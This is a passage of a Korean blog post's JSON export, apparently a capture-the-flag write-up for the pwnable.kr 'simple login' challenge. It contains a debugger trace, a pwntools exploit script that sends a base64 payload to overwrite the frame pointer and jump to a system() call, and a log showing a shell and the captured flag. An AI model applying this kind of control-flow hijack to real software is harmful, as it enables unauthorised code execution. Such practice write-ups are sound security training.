(\"(\"?)\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:x86:32 \u2500\u2500\u2500\u2500\n    0x804941a <main+010d>      call   0x805c2d0 <puts>\n    0x804941f <main+0112>      mov    eax, 0x0\n    0x8049424 <main+0117>      leave  \n \u2192  0x8049425 <main+0118>      ret    \n   \u21b3   0x8049284 <correct+0025>   mov    DWORD PTR [esp], 0x80da66f\n       0x804928b <correct+002c>   call   0x805b2b0 <system>\n       0x8049290 <correct+0031>   mov    DWORD PTR [esp], 0x0\n       0x8049297 <correct+0038>   call   0x805a6a0 <exit>\n       0x804929c <auth+0000>      push   ebp\n       0x804929d <auth+0001>      mov    ebp, esp\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 threads \u2500\u2500\u2500\u2500\n[#0] Id 1, Name: \"simplelogin\", stopped 0x8049425 in main (), reason: SINGLE STEP\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 trace \u2500\u2500\u2500\u2500\n[#0] 0x8049425 \u2192 main()\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\ngef\u27a4  <\/pre>\n\n\n\n
solve.py<\/h1>\n\n\n\n
from pwn import *\n#context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\nimport base64\n\n# p = process(\".\/simplelogin\")\np = remote(\"127.0.0.1\", 9003)\ne = ELF('.\/simplelogin', checksec=False)\n\n\npayload = b\"A\"*4\npayload += p32(0x08049284)  #\npayload += p32(0x811eb40)   #\n\n# input()\np.sendlineafter(\"Authenticate : \", base64.b64encode(payload))\n\n\np.interactive()<\/pre>\n\n\n\n
Result<\/h1>\n\n\n\n
simplelogin@ubuntu:~$ mkdir \/tmp\/w4_1\nsimplelogin@ubuntu:~$ cd \/tmp\/w4_1\n\nsimplelogin@ubuntu:\/tmp\/w4_1$ ln -sf \/home\/simplelogin\/simplelogin  .\/simplelogin\n\nsimplelogin@ubuntu:\/tmp\/w4_1$ nano solve.py\n\nsimplelogin@ubuntu:\/tmp\/w4_1$ python3 solve.py\n[+] Opening connection to 127.0.0.1 on port 9003: Done\n[*] Switching to interactive mode\nhash : 629aa0e67eb4febb7a47bf1f2ccb5383\n$ ls\nflag\nlog\nsimplelogin\nsuper.pl\n$ cat flag\nC0ntrol_EBP_E5P_EIP_and_rul3_th3_w0rld\n$ \n[*] Interrupted\n[*] Closed connection to 127.0.0.1 port 9003<\/pre>\n","protected":false},"excerpt":{"rendered":"
Description Decompiled src \ucd5c\ub300 30\ubc14\uc774\ud2b8\uc758 Base64 \uc778\ucf54\ub529\ub41c \uc778\uc99d \ubb38\uc790\uc5f4\uc744 \uc785\ub825\ubc1b\uc544 s \ubc30\uc5f4\uc5d0 \uc785\ub825\ubc1b\uc744 \uc218 \uc788\ub2e4. Base64Decode \ud568\uc218\ub294 s\uc5d0 \uc800\uc7a5\ub41c Base64 \ubb38\uc790\uc5f4\uc744 \ub514\ucf54\ub529\ud558\uc5ec, v4\uc5d0 \uc800\uc7a5\ud558\uace0, \ub514\ucf54\ub529\ub41c \ubc14\uc774\ud2b8 \uc218\ub97c \ubc18\ud658\ud55c\ub2e4. \ub514\ucf54\ub529\ub41c \ub370\uc774\ud130\ub294 input \uc804\uc5ed\ubcc0\uc218\uc5d0 \ubcf5\uc0ac\ud558\ub294\ub370 \ucd5c\ub300 0xC, 12 \ubc14\uc774\ud2b8\uae4c\uc9c0 \ubcf5\uc0ac\ud560 \uc218 \uc788\ub2e4. input \uc804\uc5ed\ubcc0\uc218 \ub370\uc774\ud130\ub294 auth \ud568\uc218\ub97c \uac70\uccd0 md5 \ud574\uc2dc\uac12\uc774 \u201cf87cd601aa7fedca99018a8be88eda34\u201d \uc77c \uacbd\uc6b0\uc5d0 correct() \ud568\uc218\ub97c \ud638\ucd9c\ud55c\ub2e4. \uc5ec\uae30\uc11c… \ub354 \ubcf4\uae30 »simple login<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[4],"tags":[25],"class_list":["post-3267","post","type-post","status-publish","format-standard","hentry","category-pwnable-kr","tag-pwnable"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3267","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3267"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3267\/revisions"}],"predecessor-version":[{"id":3270,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3267\/revisions\/3270"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3267"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3267"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3267"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}